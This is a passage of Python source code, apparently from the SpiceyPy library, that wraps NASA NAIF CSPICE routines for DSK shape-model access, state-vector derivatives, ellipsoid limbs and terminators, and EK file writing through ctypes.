    Fetch double precision data from a type 2 DSK segment.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskd02_c.html

    :param handle: DSK file handle
    :type handle: int
    :param dladsc: DLA descriptor
    :type dladsc: spiceypy.utils.support_types.SpiceDLADescr
    :param item: Keyword identifying item to fetch
    :type item: int
    :param start: Start index
    :type start: int
    :param room: Amount of room in output array
    :type room: int
    :return: Array containing requested item
    :rtype: numpy.ndarray
    """
    # CSPICE also reports how many values it returned (n); the full buffer
    # of size room is converted back, matching the original behavior.
    n = ctypes.c_int(0)
    values = stypes.emptyDoubleVector(room)
    libspice.dskd02_c(ctypes.c_int(handle), dladsc, ctypes.c_int(item),
                      ctypes.c_int(start), ctypes.c_int(room),
                      ctypes.byref(n), values)
    return stypes.cVectorToPython(values)
@spiceErrorCheck
def dskgd(handle, dladsc):
    """
    Return the DSK descriptor from a DSK segment identified
    by a DAS handle and DLA descriptor.
    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskgd_c.html
    :param handle: Handle assigned to the opened DSK file.
    :type handle: int
    :param dladsc: DLA segment descriptor.
    :type dladsc: spiceypy.utils.support_types.SpiceDLADescr
    :return: DSK segment descriptor.
    :rtype: stypes.SpiceDSKDescr
    """
    # CSPICE fills this descriptor struct in place.
    descr = stypes.SpiceDSKDescr()
    libspice.dskgd_c(ctypes.c_int(handle), ctypes.byref(dladsc),
                     ctypes.byref(descr))
    return descr
@spiceErrorCheck
def dskgtl(keywrd):
    """
    Retrieve the value of a specified DSK tolerance or margin parameter.
    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskgtl_c.html
    :param keywrd: Code specifying parameter to retrieve.
    :type keywrd: int
    :return: Value of parameter.
    :rtype: float
    """
    value = ctypes.c_double(0)
    libspice.dskgtl_c(ctypes.c_int(keywrd), ctypes.byref(value))
    return value.value
@spiceErrorCheck
def dski02(handle, dladsc, item, start, room):
    """
    Fetch integer data from a type 2 DSK segment.
    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dski02_c.html
    :param handle: DSK file handle.
    :type handle: int
    :param dladsc: DLA descriptor.
    :type dladsc: spiceypy.utils.support_types.SpiceDLADescr
    :param item: Keyword identifying item to fetch.
    :type item: int
    :param start: Start index.
    :type start: int
    :param room: Amount of room in output array.
    :type room: int
    :return: Array containing requested item.
    :rtype: array
    """
    handle = ctypes.c_int(handle)
    item = ctypes.c_int(item)
    start = ctypes.c_int(start)
    room = ctypes.c_int(room)
    n = ctypes.c_int()
    values = stypes.emptyIntVector(room)
    libspice.dski02_c(handle, dladsc, item, start, room, ctypes.byref(n), values)
    # Bug fix: `values` is a flat int vector, so it must be converted with the
    # vector converter (as the sibling dskd02 does), not cMatrixToNumpy.
    return stypes.cVectorToPython(values)
@spiceErrorCheck
def dskmi2(vrtces, plates, finscl, corscl, worksz, voxpsz, voxlsz, makvtl, spxisz):
    """
    Make spatial index for a DSK type 2 segment. The index is returned
    as a pair of arrays, one of type int and one of type
    float. These arrays are suitable for use with the DSK type 2
    writer dskw02.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskmi2_c.html
    :param vrtces: Vertices
    :type vrtces: NxM-Element Array of floats
    :param plates: Plates
    :type plates: NxM-Element Array of ints
    :param finscl: Fine voxel scale
    :type finscl: float
    :param corscl: Coarse voxel scale
    :type corscl: int
    :param worksz: Workspace size
    :type worksz: int
    :param voxpsz: Voxel plate pointer array size
    :type voxpsz: int
    :param voxlsz: Voxel plate list array size
    :type voxlsz: int
    :param makvtl: Vertex plate list flag
    :type makvtl: bool
    :param spxisz: Spatial index integer component size
    :type spxisz: int
    :return: double precision and integer components of the spatial index of the segment.
    :rtype: tuple
    """
    # Vertex and plate counts are taken from the input sequences before
    # they are converted to C matrices.
    nv = ctypes.c_int(len(vrtces))
    vrtces = stypes.toDoubleMatrix(vrtces)
    np = ctypes.c_int(len(plates))
    plates = stypes.toIntMatrix(plates)
    finscl = ctypes.c_double(finscl)
    corscl = ctypes.c_int(corscl)
    worksz = ctypes.c_int(worksz)
    voxpsz = ctypes.c_int(voxpsz)
    voxlsz = ctypes.c_int(voxlsz)
    makvtl = ctypes.c_int(makvtl)  # bool flag marshaled as a C int
    spxisz = ctypes.c_int(spxisz)
    # Scratch workspace for the index builder; sized by the caller.
    work = stypes.emptyIntMatrix(2, worksz)
    spaixd = stypes.emptyDoubleVector(10)  # SPICE_DSK02_SPADSZ
    spaixi = stypes.emptyIntVector(spxisz)
    libspice.dskmi2_c(nv, vrtces, np, plates, finscl, corscl, worksz, voxpsz, voxlsz, makvtl, spxisz, work, spaixd, spaixi)
    return stypes.cVectorToPython(spaixd), stypes.cVectorToPython(spaixi)
@spiceErrorCheck
def dskn02(handle, dladsc, plid):
    """
    Compute the unit normal vector for a specified plate from a type
    2 DSK segment.
    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskn02_c.html
    :param handle: DSK file handle.
    :type handle: int
    :param dladsc: DLA descriptor.
    :type dladsc: spiceypy.utils.support_types.SpiceDLADescr
    :param plid: Plate ID.
    :type plid: int
    :return: Plate's unit normal vector.
    :rtype: 3-Element Array of floats.
    """
    handle = ctypes.c_int(handle)
    plid = ctypes.c_int(plid)
    # CSPICE writes the 3-vector normal into this output buffer.
    normal = stypes.emptyDoubleVector(3)
    libspice.dskn02_c(handle, dladsc, plid, normal)
    return stypes.cVectorToPython(normal)
@spiceErrorCheck
def dskobj(dsk):
    """
    Find the set of body ID codes of all objects for which
    topographic data are provided in a specified DSK file.
    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskobj_c.html
    :param dsk: Name of DSK file.
    :type dsk: str
    :return: Set of ID codes of objects in DSK file.
    :rtype: spiceypy.utils.support_types.SpiceCell
    """
    # Result cell sized generously; CSPICE appends the body IDs it finds.
    bodids = stypes.SPICEINT_CELL(10000)
    libspice.dskobj_c(stypes.stringToCharP(dsk), ctypes.byref(bodids))
    return bodids
@spiceErrorCheck
def dskopn(fname, ifname, ncomch):
    """
    Open a new DSK file for subsequent write operations.
    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskopn_c.html
    :param fname: Name of a DSK file to be opened.
    :type fname: str
    :param ifname: Internal file name.
    :type ifname: str
    :param ncomch: Number of comment characters to allocate.
    :type ncomch: int
    :return: Handle assigned to the opened DSK file.
    :rtype: int
    """
    handle = ctypes.c_int()
    libspice.dskopn_c(stypes.stringToCharP(fname),
                      stypes.stringToCharP(ifname),
                      ctypes.c_int(ncomch),
                      ctypes.byref(handle))
    return handle.value
@spiceErrorCheck
def dskp02(handle, dladsc, start, room):
    """
    Fetch triangular plates from a type 2 DSK segment.
    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskp02_c.html
    :param handle: DSK file handle.
    :type handle: int
    :param dladsc: DLA descriptor.
    :type dladsc: spiceypy.utils.support_types.SpiceDLADescr
    :param start: Start index.
    :type start: int
    :param room: Amount of room in output array.
    :type room: int
    :return: Array containing plates.
    """
    # Each plate is a triple of vertex indices, hence a 3 x room matrix.
    plates = stypes.emptyIntMatrix(3, room)
    count = ctypes.c_int(0)
    libspice.dskp02_c(ctypes.c_int(handle), dladsc, ctypes.c_int(start),
                      ctypes.c_int(room), ctypes.byref(count), plates)
    return stypes.cMatrixToNumpy(plates)
@spiceErrorCheck
def dskrb2(vrtces, plates, corsys, corpar):
    """
    Determine range bounds for a set of triangular plates to
    be stored in a type 2 DSK segment.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskrb2_c.html
    :param vrtces: Vertices
    :type vrtces: NxM-Element Array of floats
    :param plates: Plates
    :type plates: NxM-Element Array of ints
    :param corsys: DSK coordinate system code
    :type corsys: int
    :param corpar: DSK coordinate system parameters
    :type corpar: N-Element Array of floats
    :return: Lower and Upper bound on range of third coordinate
    :rtype: tuple
    """
    # Counts must be captured from the Python sequences before conversion.
    nv = ctypes.c_int(len(vrtces))
    np = ctypes.c_int(len(plates))
    vmat = stypes.toDoubleMatrix(vrtces)
    pmat = stypes.toIntMatrix(plates)
    mncor3 = ctypes.c_double(0.0)
    mxcor3 = ctypes.c_double(0.0)
    libspice.dskrb2_c(nv, vmat, np, pmat, ctypes.c_int(corsys),
                      stypes.toDoubleVector(corpar),
                      ctypes.byref(mncor3), ctypes.byref(mxcor3))
    return mncor3.value, mxcor3.value
@spiceErrorCheck
def dsksrf(dsk, bodyid):
    """
    Find the set of surface ID codes for all surfaces associated with
    a given body in a specified DSK file.
    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dsksrf_c.html
    :param dsk: Name of DSK file.
    :type dsk: str
    :param bodyid: Integer body ID code.
    :type bodyid: int
    :return: Set of ID codes of surfaces in DSK file.
    """
    # Result cell sized generously; CSPICE appends the surface IDs it finds.
    srfids = stypes.SPICEINT_CELL(10000)
    libspice.dsksrf_c(stypes.stringToCharP(dsk), ctypes.c_int(bodyid),
                      ctypes.byref(srfids))
    return srfids
@spiceErrorCheck
def dskstl(keywrd, dpval):
    """
    Set the value of a specified DSK tolerance or margin parameter.
    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskstl_c.html
    :param keywrd: Code specifying parameter to set.
    :type keywrd: int
    :param dpval: Value of parameter.
    :type dpval: float
    :return:
    """
    libspice.dskstl_c(ctypes.c_int(keywrd), ctypes.c_double(dpval))
@spiceErrorCheck
def dskv02(handle, dladsc, start, room):
    """
    Fetch vertices from a type 2 DSK segment.
    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskv02_c.html
    :param handle: DSK file handle.
    :type handle: int
    :param dladsc: DLA descriptor.
    :type dladsc: spiceypy.utils.support_types.SpiceDLADescr
    :param start: Start index.
    :type start: int
    :param room: Amount of room in output array.
    :type room: int
    :return: Array containing vertices.
    :rtype: Room x 3-Element Array of floats
    """
    # Each vertex is an (x, y, z) triple, hence a 3 x room matrix.
    vrtces = stypes.emptyDoubleMatrix(3, room)
    count = ctypes.c_int()
    libspice.dskv02_c(ctypes.c_int(handle), dladsc, ctypes.c_int(start),
                      ctypes.c_int(room), ctypes.byref(count), vrtces)
    return stypes.cMatrixToNumpy(vrtces)
@spiceErrorCheck
def dskw02(handle, center, surfid, dclass, fname, corsys, corpar, mncor1,
           mxcor1, mncor2, mxcor2, mncor3, mxcor3, first, last, vrtces,
           plates, spaixd, spaixi):
    """
    Write a type 2 segment to a DSK file.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskw02_c.html
    :param handle: Handle assigned to the opened DSK file
    :type handle: int
    :param center: Central body ID code
    :type center: int
    :param surfid: Surface ID code
    :type surfid: int
    :param dclass: Data class
    :type dclass: int
    :param fname: Reference frame
    :type fname: str
    :param corsys: Coordinate system code
    :type corsys: int
    :param corpar: Coordinate system parameters
    :type corpar: N-Element Array of floats
    :param mncor1: Minimum value of first coordinate
    :type mncor1: float
    :param mxcor1: Maximum value of first coordinate
    :type mxcor1: float
    :param mncor2: Minimum value of second coordinate
    :type mncor2: float
    :param mxcor2: Maximum value of second coordinate
    :type mxcor2: float
    :param mncor3: Minimum value of third coordinate
    :type mncor3: float
    :param mxcor3: Maximum value of third coordinate
    :type mxcor3: float
    :param first: Coverage start time
    :type first: float
    :param last: Coverage stop time
    :type last: float
    :param vrtces: Vertices
    :type vrtces: NxM-Element Array of floats
    :param plates: Plates
    :type plates: NxM-Element Array of ints
    :param spaixd: Double precision component of spatial index
    :type spaixd: N-Element Array of floats
    :param spaixi: Integer component of spatial index
    :type spaixi: N-Element Array of ints
    """
    # Every scalar is converted to its ctypes equivalent; argument order
    # below must exactly mirror the CSPICE dskw02_c prototype.
    handle = ctypes.c_int(handle)
    center = ctypes.c_int(center)
    surfid = ctypes.c_int(surfid)
    dclass = ctypes.c_int(dclass)
    fname = stypes.stringToCharP(fname)
    corsys = ctypes.c_int(corsys)
    corpar = stypes.toDoubleVector(corpar)
    mncor1 = ctypes.c_double(mncor1)
    mxcor1 = ctypes.c_double(mxcor1)
    mncor2 = ctypes.c_double(mncor2)
    mxcor2 = ctypes.c_double(mxcor2)
    mncor3 = ctypes.c_double(mncor3)
    mxcor3 = ctypes.c_double(mxcor3)
    first = ctypes.c_double(first)
    last = ctypes.c_double(last)
    # Vertex/plate counts are taken from the input sequences before the
    # sequences themselves are converted to C matrices.
    nv = ctypes.c_int(len(vrtces))
    vrtces = stypes.toDoubleMatrix(vrtces)
    np = ctypes.c_int(len(plates))
    plates = stypes.toIntMatrix(plates)
    spaixd = stypes.toDoubleVector(spaixd)
    spaixi = stypes.toIntVector(spaixi)
    libspice.dskw02_c(handle, center, surfid, dclass, fname, corsys, corpar,
                      mncor1, mxcor1, mncor2, mxcor2, mncor3, mxcor3, first,
                      last, nv, vrtces, np, plates, spaixd, spaixi)
@spiceErrorCheck
def dskx02(handle, dladsc, vertex, raydir):
    """
    Determine the plate ID and body-fixed coordinates of the
    intersection of a specified ray with the surface defined by a
    type 2 DSK plate model.
    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskx02_c.html
    :param handle: Handle of DSK kernel containing plate model.
    :type handle: int
    :param dladsc: DLA descriptor of plate model segment.
    :type dladsc: spiceypy.utils.support_types.SpiceDLADescr
    :param vertex: Ray's vertex in the body fixed frame.
    :type vertex: 3-Element Array of floats
    :param raydir: Ray direction in the body fixed frame.
    :type raydir: 3-Element Array of floats
    :return: ID code of the plate intersected by the ray, Intercept, and Flag indicating whether intercept exists.
    :rtype: tuple
    """
    # Output slots filled by CSPICE: plate id, intercept point, found flag.
    plid = ctypes.c_int()
    xpt = stypes.emptyDoubleVector(3)
    found = ctypes.c_int()
    libspice.dskx02_c(ctypes.c_int(handle), ctypes.byref(dladsc),
                      stypes.toDoubleVector(vertex),
                      stypes.toDoubleVector(raydir),
                      ctypes.byref(plid), xpt, ctypes.byref(found))
    return plid.value, stypes.cVectorToPython(xpt), bool(found.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def dskxsi(pri, target, srflst, et, fixref, vertex, raydir):
    """
    Compute a ray-surface intercept using data provided by
    multiple loaded DSK segments. Return information about
    the source of the data defining the surface on which the
    intercept was found: DSK handle, DLA and DSK descriptors,
    and DSK data type-dependent parameters.
    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskxsi_c.html
    :param pri: Data prioritization flag.
    :type pri: bool
    :param target: Target body name.
    :type target: str
    :param srflst: Surface ID list.
    :type srflst: list of int
    :param et: Epoch, expressed as seconds past J2000 TDB.
    :type et: float
    :param fixref: Name of target body-fixed reference frame.
    :type fixref: str
    :param vertex: Vertex of ray.
    :type vertex: 3-Element Array of floats
    :param raydir: Direction vector of ray.
    :type raydir: 3-Element Array of floats
    :return: Intercept point, Handle of segment contributing surface data, DLADSC, DSKDSC, Double precision component of source info, Integer component of source info
    :rtype: tuple
    """
    pri = ctypes.c_int(pri)  # bool flag marshaled as a C int
    target = stypes.stringToCharP(target)
    nsurf = ctypes.c_int(len(srflst))
    srflst = stypes.toIntVector(srflst)
    et = ctypes.c_double(et)
    fixref = stypes.stringToCharP(fixref)
    vertex = stypes.toDoubleVector(vertex)
    raydir = stypes.toDoubleVector(raydir)
    # Declared sizes of the dc/ic source-info output arrays below (both 1).
    maxd = ctypes.c_int(1)
    maxi = ctypes.c_int(1)
    xpt = stypes.emptyDoubleVector(3)
    handle = ctypes.c_int(0)
    dladsc = stypes.SpiceDLADescr()
    dskdsc = stypes.SpiceDSKDescr()
    dc = stypes.emptyDoubleVector(1)
    ic = stypes.emptyIntVector(1)
    found = ctypes.c_int()
    # NOTE(review): handle, dladsc, dskdsc and found are passed without
    # ctypes.byref; this presumably relies on libspice's declared argtypes
    # to convert them to pointers — confirm the prototype declarations.
    libspice.dskxsi_c(pri, target, nsurf, srflst, et, fixref, vertex, raydir, maxd, maxi, xpt, handle, dladsc, dskdsc, dc, ic, found)
    return stypes.cVectorToPython(xpt), handle.value, dladsc, dskdsc, stypes.cVectorToPython(dc), stypes.cVectorToPython(ic), bool(found.value)
@spiceErrorCheck
def dskxv(pri, target, srflst, et, fixref, vtxarr, dirarr):
    """
    Compute ray-surface intercepts for a set of rays, using data
    provided by multiple loaded DSK segments.
    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskxv_c.html
    :param pri: Data prioritization flag.
    :type pri: bool
    :param target: Target body name.
    :type target: str
    :param srflst: Surface ID list.
    :type srflst: list of int
    :param et: Epoch, expressed as seconds past J2000 TDB.
    :type et: float
    :param fixref: Name of target body-fixed reference frame.
    :type fixref: str
    :param vtxarr: Array of vertices of rays.
    :type vtxarr: Nx3-Element Array of floats
    :param dirarr: Array of direction vectors of rays.
    :type dirarr: Nx3-Element Array of floats
    :return: Intercept point array and Found flag array.
    :rtype: tuple
    """
    pri = ctypes.c_int(pri)  # bool flag marshaled as a C int
    target = stypes.stringToCharP(target)
    nsurf = ctypes.c_int(len(srflst))
    srflst = stypes.toIntVector(srflst)
    et = ctypes.c_double(et)
    fixref = stypes.stringToCharP(fixref)
    # Ray count is captured before the vertex array is converted.
    nray = ctypes.c_int(len(vtxarr))
    vtxarr = stypes.toDoubleMatrix(vtxarr)
    dirarr = stypes.toDoubleMatrix(dirarr)
    # NOTE(review): nray is a ctypes.c_int here, not a plain int — assumes
    # the stypes sizing helpers accept c_int sizes; confirm in support_types.
    xptarr = stypes.emptyDoubleMatrix(y=nray)
    fndarr = stypes.emptyIntVector(nray)
    libspice.dskxv_c(pri, target, nsurf, srflst, et, fixref, nray, vtxarr, dirarr, xptarr, fndarr)
    return stypes.cMatrixToNumpy(xptarr), stypes.cVectorToPython(fndarr)
@spiceErrorCheck
def dskz02(handle, dladsc):
    """
    Return plate model size parameters---plate count and
    vertex count---for a type 2 DSK segment.
    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskz02_c.html
    :param handle: DSK file handle.
    :type handle: int
    :param dladsc: DLA descriptor.
    :type dladsc: spiceypy.utils.support_types.SpiceDLADescr
    :return: Number of vertices, Number of plates.
    :rtype: tuple
    """
    nverts = ctypes.c_int()
    nplates = ctypes.c_int()
    libspice.dskz02_c(ctypes.c_int(handle), dladsc,
                      ctypes.byref(nverts), ctypes.byref(nplates))
    return nverts.value, nplates.value
@spiceErrorCheck
def dsphdr(x, y, z):
    """
    This routine computes the Jacobian of the transformation from
    rectangular to spherical coordinates.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dsphdr_c.html
    :param x: X-coordinate of point.
    :type x: float
    :param y: Y-coordinate of point.
    :type y: float
    :param z: Z-coordinate of point.
    :type z: float
    :return: Matrix of partial derivatives.
    :rtype: 3x3-Element Array of floats
    """
    # CSPICE fills the 3x3 Jacobian in place.
    jacobi = stypes.emptyDoubleMatrix()
    libspice.dsphdr_c(ctypes.c_double(x), ctypes.c_double(y),
                      ctypes.c_double(z), jacobi)
    return stypes.cMatrixToNumpy(jacobi)
@spiceErrorCheck
@spiceFoundExceptionThrower
def dtpool(name):
    """
    Return the data about a kernel pool variable.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dtpool_c.html
    :param name: Name of the variable whose value is to be returned.
    :type name: str
    :return:
            Number of values returned for name,
            Type of the variable "C", "N", or "X".
    :rtype: tuple
    """
    found = ctypes.c_int()
    count = ctypes.c_int()
    vartype = ctypes.c_char()
    libspice.dtpool_c(stypes.stringToCharP(name), ctypes.byref(found),
                      ctypes.byref(count), ctypes.byref(vartype))
    return count.value, stypes.toPythonString(vartype.value), bool(found.value)
@spiceErrorCheck
def ducrss(s1, s2):
    """
    Compute the unit vector parallel to the cross product of
    two 3-dimensional vectors and the derivative of this unit vector.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ducrss_c.html
    :param s1: Left hand state for cross product and derivative.
    :type s1: 6-Element Array of floats
    :param s2: Right hand state for cross product and derivative.
    :type s2: 6-Element Array of floats
    :return: Unit vector and derivative of the cross product.
    :rtype: 6-Element Array of floats
    """
    # Fix: `is` compares object identity; for ints that is an implementation
    # detail (and a SyntaxWarning on modern CPython). Compare by value.
    assert len(s1) == 6 and len(s2) == 6
    s1 = stypes.toDoubleVector(s1)
    s2 = stypes.toDoubleVector(s2)
    sout = stypes.emptyDoubleVector(6)
    libspice.ducrss_c(s1, s2, sout)
    return stypes.cVectorToPython(sout)
@spiceErrorCheck
def dvcrss(s1, s2):
    """
    Compute the cross product of two 3-dimensional vectors
    and the derivative of this cross product.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dvcrss_c.html
    :param s1: Left hand state for cross product and derivative.
    :type s1: 6-Element Array of floats
    :param s2: Right hand state for cross product and derivative.
    :type s2: 6-Element Array of floats
    :return: State associated with cross product of positions.
    :rtype: 6-Element Array of floats
    """
    # Fix: use value equality instead of `is` for the int length check.
    assert len(s1) == 6 and len(s2) == 6
    s1 = stypes.toDoubleVector(s1)
    s2 = stypes.toDoubleVector(s2)
    sout = stypes.emptyDoubleVector(6)
    libspice.dvcrss_c(s1, s2, sout)
    return stypes.cVectorToPython(sout)
@spiceErrorCheck
def dvdot(s1, s2):
    """
    Compute the derivative of the dot product of two double
    precision position vectors.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dvdot_c.html
    :param s1: First state vector in the dot product.
    :type s1: 6-Element Array of floats
    :param s2: Second state vector in the dot product.
    :type s2: 6-Element Array of floats
    :return: The derivative of the dot product.
    :rtype: float
    """
    # Fix: use value equality instead of `is` for the int length check.
    assert len(s1) == 6 and len(s2) == 6
    s1 = stypes.toDoubleVector(s1)
    s2 = stypes.toDoubleVector(s2)
    return libspice.dvdot_c(s1, s2)
@spiceErrorCheck
def dvhat(s1):
    """
    Find the unit vector corresponding to a state vector and the
    derivative of the unit vector.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dvhat_c.html
    :param s1: State to be normalized.
    :type s1: 6-Element Array of floats
    :return: Unit vector s1 / abs(s1), and its time derivative.
    :rtype: 6-Element Array of floats
    """
    # Fix: use value equality instead of `is` for the int length check.
    assert len(s1) == 6
    s1 = stypes.toDoubleVector(s1)
    sout = stypes.emptyDoubleVector(6)
    libspice.dvhat_c(s1, sout)
    return stypes.cVectorToPython(sout)
@spiceErrorCheck
def dvnorm(state):
    """
    Function to calculate the derivative of the norm of a 3-vector.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dvnorm_c.html
    :param state:
                A 6-vector composed of three coordinates and their derivatives.
    :type state: 6-Element Array of floats
    :return: The derivative of the norm of a 3-vector.
    :rtype: float
    """
    # Fix: use value equality instead of `is` for the int length check.
    assert len(state) == 6
    state = stypes.toDoubleVector(state)
    return libspice.dvnorm_c(state)
@spiceErrorCheck
def dvpool(name):
    """
    Delete a variable from the kernel pool.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dvpool_c.html
    :param name: Name of the kernel variable to be deleted.
    :type name: str
    """
    libspice.dvpool_c(stypes.stringToCharP(name))
@spiceErrorCheck
def dvsep(s1, s2):
    """
    Calculate the time derivative of the separation angle between
    two input states, S1 and S2.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dvsep_c.html
    :param s1: State vector of the first body.
    :type s1: 6-Element Array of floats
    :param s2: State vector of the second body.
    :type s2: 6-Element Array of floats
    :return: The time derivative of the angular separation between S1 and S2.
    :rtype: float
    """
    # Fix: use value equality instead of `is` for the int length check.
    assert len(s1) == 6 and len(s2) == 6
    s1 = stypes.toDoubleVector(s1)
    s2 = stypes.toDoubleVector(s2)
    return libspice.dvsep_c(s1, s2)
################################################################################
# E
@spiceErrorCheck
def edlimb(a, b, c, viewpt):
    """
    Find the limb of a triaxial ellipsoid, viewed from a specified point.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/edlimb_c.html
    :param a: Length of ellipsoid semi-axis lying on the x-axis.
    :type a: float
    :param b: Length of ellipsoid semi-axis lying on the y-axis.
    :type b: float
    :param c: Length of ellipsoid semi-axis lying on the z-axis.
    :type c: float
    :param viewpt: Location of viewing point.
    :type viewpt: 3-Element Array of floats
    :return: Limb of ellipsoid as seen from viewing point.
    :rtype: spiceypy.utils.support_types.Ellipse
    """
    # CSPICE writes the limb ellipse into this output struct.
    limb = stypes.Ellipse()
    libspice.edlimb_c(ctypes.c_double(a), ctypes.c_double(b),
                      ctypes.c_double(c), stypes.toDoubleVector(viewpt),
                      ctypes.byref(limb))
    return limb
@spiceErrorCheck
def edterm(trmtyp, source, target, et, fixref, abcorr, obsrvr, npts):
    """
    Compute a set of points on the umbral or penumbral terminator of
    a specified target body, where the target shape is modeled as an
    ellipsoid.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/edterm_c.html
    :param trmtyp: Terminator type.
    :type trmtyp: str
    :param source: Light source.
    :type source: str
    :param target: Target body.
    :type target: str
    :param et: Observation epoch.
    :type et: float
    :param fixref: Body-fixed frame associated with target.
    :type fixref: str
    :param abcorr: Aberration correction.
    :type abcorr: str
    :param obsrvr: Observer.
    :type obsrvr: str
    :param npts: Number of points in terminator set.
    :type npts: int
    :return:
            Epoch associated with target center,
            Position of observer in body-fixed frame,
            Terminator point set.
    :rtype: tuple
    """
    trmtyp = stypes.stringToCharP(trmtyp)
    source = stypes.stringToCharP(source)
    target = stypes.stringToCharP(target)
    et = ctypes.c_double(et)
    fixref = stypes.stringToCharP(fixref)
    abcorr = stypes.stringToCharP(abcorr)
    obsrvr = stypes.stringToCharP(obsrvr)
    trgepc = ctypes.c_double()
    obspos = stypes.emptyDoubleVector(3)
    # The output matrix is sized with the plain-int npts before npts itself
    # is converted to a C int for the call.
    trmpts = stypes.emptyDoubleMatrix(x=3, y=npts)
    npts = ctypes.c_int(npts)
    libspice.edterm_c(trmtyp, source, target, et, fixref, abcorr, obsrvr, npts,
                      ctypes.byref(trgepc), obspos, trmpts)
    return trgepc.value, stypes.cVectorToPython(obspos), stypes.cMatrixToNumpy(
            trmpts)
@spiceErrorCheck
def ekacec(handle, segno, recno, column, nvals, cvals, isnull):
    """
    Add data to a character column in a specified EK record.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekacec_c.html
    :param handle: EK file handle.
    :type handle: int
    :param segno: Index of segment containing record.
    :type segno: int
    :param recno: Record to which data is to be added.
    :type recno: int
    :param column: Column name.
    :type column: str
    :param nvals: Number of values to add to column.
    :type nvals: int
    :param cvals: Character values to add to column.
    :type cvals: list of str.
    :param isnull: Flag indicating whether column entry is null.
    :type isnull: bool
    """
    # Row width is the longest string plus one byte for the NUL terminator.
    vallen = ctypes.c_int(len(max(cvals, key=len)) + 1)
    cvalarr = stypes.listToCharArrayPtr(cvals)
    libspice.ekacec_c(ctypes.c_int(handle), ctypes.c_int(segno),
                      ctypes.c_int(recno), stypes.stringToCharP(column),
                      ctypes.c_int(nvals), vallen, cvalarr,
                      ctypes.c_int(isnull))
@spiceErrorCheck
def ekaced(handle, segno, recno, column, nvals, dvals, isnull):
    """
    Add data to a double precision column in a specified EK record.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekaced_c.html
    :param handle: EK file handle.
    :type handle: int
    :param segno: Index of segment containing record.
    :type segno: int
    :param recno: Record to which data is to be added.
    :type recno: int
    :param column: Column name.
    :type column: str
    :param nvals: Number of values to add to column.
    :type nvals: int
    :param dvals: Double precision values to add to column.
    :type dvals: Array of floats
    :param isnull: Flag indicating whether column entry is null.
    :type isnull: bool
    """
    libspice.ekaced_c(ctypes.c_int(handle), ctypes.c_int(segno),
                      ctypes.c_int(recno), stypes.stringToCharP(column),
                      ctypes.c_int(nvals), stypes.toDoubleVector(dvals),
                      ctypes.c_int(isnull))
@spiceErrorCheck
def ekacei(handle, segno, recno, column, nvals, ivals, isnull):
    """
    Add data to an integer column in a specified EK record.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekacei_c.html
    :param handle: EK file handle.
    :type handle: int
    :param segno: Index of segment containing record.
    :type segno: int
    :param recno: Record to which data is to be added.
    :type recno: int
    :param column: Column name.
    :type column: str
    :param nvals: Number of values to add to column.
    :type nvals: int
    :param ivals: Integer values to add to column.
    :type ivals: Array of ints
    :param isnull: Flag indicating whether column entry is null.
    :type isnull: bool
    """
    libspice.ekacei_c(ctypes.c_int(handle), ctypes.c_int(segno),
                      ctypes.c_int(recno), stypes.stringToCharP(column),
                      ctypes.c_int(nvals), stypes.toIntVector(ivals),
                      ctypes.c_int(isnull))
@spiceErrorCheck
def ekaclc(handle, segno, column, vallen, cvals, entszs, nlflgs, rcptrs,
           wkindx):
    """
    Add an entire character column to an EK segment.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekaclc_c.html
    :param handle: EK file handle.
    :type handle: int
    :param segno: Number of segment to add column to.
    :type segno: int
    :param column: Column name.
    :type column: str
    :param vallen: Length of character values.
    :type vallen: int
    :param cvals: Character values to add to column.
    :type cvals: list of str.
    :param entszs: Array of sizes of column entries.
    :type entszs: Array of ints
    :param nlflgs: Array of null flags for column entries.
    :type nlflgs: Array of bools
    :param rcptrs: Record pointers for segment.
    :type rcptrs: Array of ints
    :param wkindx: Work space for column index.
    :type wkindx: Array of ints
    :return: Work space for column index.
    :rtype: Array of ints
    """
    handle = ctypes.c_int(handle)
    segno = ctypes.c_int(segno)
    column = stypes.stringToCharP(column)
    vallen = ctypes.c_int(vallen)
    cvals = stypes.listToCharArrayPtr(cvals)
    entszs = stypes.toIntVector(entszs)
